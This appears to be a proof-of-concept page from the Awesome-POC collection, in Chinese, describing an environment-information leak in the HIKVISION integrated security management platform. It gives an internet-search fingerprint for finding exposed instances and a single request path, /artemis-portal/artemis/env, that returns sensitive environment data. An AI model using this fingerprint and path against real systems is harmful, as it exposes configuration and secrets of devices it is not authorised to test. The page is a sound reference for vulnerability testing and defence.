Awesome-POC/网络设备漏洞/HIKVISION 综合安防管理平台 env 信息泄漏漏洞.md

29 lines
533 B
Markdown
Raw Normal View History

2023-08-28 16:53:48 +08:00
# HIKVISION 综合安防管理平台 env 信息泄漏漏洞
## 漏洞描述
HIKVISION 综合安防管理平台存在信息泄漏漏洞攻击者通过漏洞可以获取环境env等敏感消息进一步攻击
## 漏洞影响
HIKVISION 综合安防管理平台
## 网络测绘
```
app="HIKVISION-综合安防管理平台"
```
## 漏洞复现
登录页面
![image-20220824134144287](./images/202208241341481.png)
验证POC
```
/artemis-portal/artemis/env
```
![image-20230828163057813](images/image-20230828163057813.png)